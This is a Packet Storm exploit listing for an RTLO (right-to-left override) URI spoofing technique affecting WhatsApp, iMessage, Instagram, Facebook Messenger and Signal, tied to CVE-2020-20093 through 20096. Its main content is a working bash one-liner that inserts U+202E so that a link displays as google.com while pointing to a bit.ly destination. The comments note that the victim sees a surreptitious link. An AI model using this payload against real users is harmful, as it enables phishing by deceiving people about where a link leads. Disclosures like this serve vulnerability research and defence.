RTLO Injection URI Spoofing ≈ Packet Storm

RTLO Injection URI Spoofing ≈ Packet Storm

Home[1] Files[2] News[3] Contact[4] Add New[5]

RTLO Injection URI Spoofing[6]
Authored by Sick Codes[7], zadewg[8]

RTLO injection URI spoofing generator for WhatsApp, iMessage, Instagram, and Facebook Messenger.

advisories | CVE-2020-20093[9], CVE-2020-20094[10], CVE-2020-20095[11], CVE-2020-20096[12]
MD5 | 6c508227541dc40dd1944f191db714a4

Change Mirror[16] Download[17]

        # Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096
#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+
# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40
APPEAR_AS='https://google.com'
DESTINATION='bit.ly/3ixIRwm'
printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"
# copy paste into any of the above apps.
# victim will see a surreptitious link
# works on latest Signal (unpatched)

Login[18] or Register[19] to add favorites

File Archive:

March 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services[123]
Hosting By
Rokasec[124]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"